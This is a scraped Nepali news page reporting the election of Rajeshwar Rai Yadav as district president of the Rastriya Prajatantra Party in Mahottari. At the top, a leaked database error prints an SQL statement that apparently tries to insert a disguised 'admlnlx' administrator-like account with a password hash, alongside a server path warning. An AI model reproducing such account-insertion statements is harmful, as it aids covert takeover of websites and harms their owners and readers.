WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQgmjAZgx2hHkEQr/6N9/3ilviIeAK/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 19:36:03', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
राप्रपा जिल्ला अध्यक्षमा यादव – Gaule Khabar

राप्रपा जिल्ला अध्यक्षमा यादव

राप्रपा जिल्ला अध्यक्षमा यादव

गौशाला, मंसिर २६ –

राष्ट्रिय प्रजातन्त्र पार्टी महोत्तरीको जिल्ला अध्यक्षमा राजेश्वर राय यादव सर्वसम्मतिले चयन हुनुभएको छ ।

शनिबार पार्टीका केन्द्रीय सदस्य तथा सांसद सुशील श्रेष्ठसमेतको उपस्थितिमा सम्पन्न जिल्ला भेलाले मानार्थ जिल्ला अध्यक्षमा प्रमोदकुमार सिंह तथा कार्यकारी अध्यक्षमा राजेश्वर राय यादवलाई चयन गरेको जनाइएको छ ।
दुई चार दिनमा पार्टी जिल्ला कार्यसमितिलाई पूर्णता दिने निर्णय भएको अध्यक्ष राय यादवले बताउनुभयो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका